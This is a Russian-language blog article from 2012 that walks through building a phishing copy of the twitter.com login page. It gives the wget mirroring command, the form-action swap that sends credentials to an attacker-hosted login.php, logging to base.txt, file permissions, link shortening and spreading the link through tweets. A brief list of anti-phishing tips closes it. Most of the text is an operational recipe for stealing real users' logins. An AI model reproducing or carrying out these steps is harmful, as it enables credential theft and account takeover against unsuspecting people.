Статьи

Фишинг: от теории к практике

26.10.2012

/

Многие из вас уже не один раз слышали о фишинге, поэтому расписывать, что это за чудо такое смысла я не вижу, а вкратце это создание фейковой страницы/сообщения/программы (нужное подчеркнуть) с целью хищения какой-либо информации о пользователе, например, его логин и пароль.

Я бы хотел рассмотреть на практическом примере создание фейковой страницы twitter.com.

Что нам понадобиться:

  • собственно хостинг на котором все и будет крутиться;
  • wget, быстро и просто создаем копию страницы, которая нас интересует;
  • Total Commander или любой другой файловый менеджер;
  • немного фантазии.

Для начала нам необходим хостинг. Мой выбор 1gb.ru. Ребята предоставляют бесплатный тестовый период – 10 дней. А нам больше и не надо! Регистрируемся по ссылке www.1gb.ru и получаем на почту данные.

Для создания копии интересующей страницы будем использовать wget. Скачать последнюю версию под Windows можно здесь

Устанавливаем, cmd->cd C:\Program Files\GnuWin32\bin (если устанавливали по умолчанию). Создаем копию twitter.com: wget –k twitter.com

После выполнения команды в каталоге C:\Program Files\GnuWin32\bin появится index.html который будет копией интересующей нас страницы.

Ключ –k позволяет преобразовать все ссылки так, чтобы прогружались стили и картинки. Так же можно использовать ключ –O , чтобы изменить место сохранения файла index.html. Больше информации обо всех возможных ключах можно получить, введя –h.

Создаем фаил login.php (собственно из названия можно понять, что он и будет отвечать за то, как пользователь будет “логиниться”) Редирект сделаем на известное видео «кот ушел», которое так сильно любят интернет пользователи.

Index.html у нас есть, теперь его надо отредактировать так, чтобы данные которые вводила жертва записывались в файл base.txt. Делаем подмену <form action="https://twitter.com/sessions" class="signin" method="post"> на наши <form action="http://rosinttwitte-com.1gb.ru/login.php" class="signin" method="post"> Чтобы login.php корректно отработал, меняем session[username_or_email] и session[password] на log и pass соответственно.

В конце создаем пустой файлик base.txt в который и будут записываться все логины и пароли которые мы поймаем.

Заливаем 3 файла на хостинг, выставляем права: Index.html – 444, base.txt – 666, login.php – 777.

Дело осталось за малым, скормить ссылку. Выглядит она, мягко говоря, не очень: http://rosinttwitte-com.1gb.ru/ .Воспользуемся сервисом сокращения ссылок http://u.to/, что так распространено в твиттере. Получается http://u.to/jxdiAg

Логинимся в твиттере, придумываем сообщение, рассылаем, ждем-с.

После перехода по ссылке, жертве предложат еще раз залогиниться, но это будет уже наша страничка. Невнимательный пользователь введет свои данные еще раз, внимательный же скорей всего заметит подмену.

Как только пользователь введет свои данные, его автоматически перешлет на видео с котом. А мы в файле base.txt получим его логин и пароль. Вроде честный обмен ;)

Как же защититься от фишинга?

Все очень просто, достаточно следовать простым правилам:

  • Как это не было бы банальным, но будьте внимательны и не открывайте ссылки от незнакомых людей, например вместо twitter.com вы можете быть перенаправлены на tvvitter.com;
  • О некоторых фишинговых атаках браузер может сам предупредить пользователя, поэтому своевременно обновляйте его;
  • Относитесь внимательно к сообщениям в которых просят указать ваши личные данные;
  • Если же вам необходимо указать личные данные в какой-либо анкете, то проверяйте начинается ли адрес с «https://», найдите рядом значок замочка, кликните по нему и сравните, совпадает ли адрес указанный в сертификате безопасности с текстом адресной строки;

  • Не используйте одни и те же пароли на всех ресурсах, также меняйте их не реже одного раза в месяц.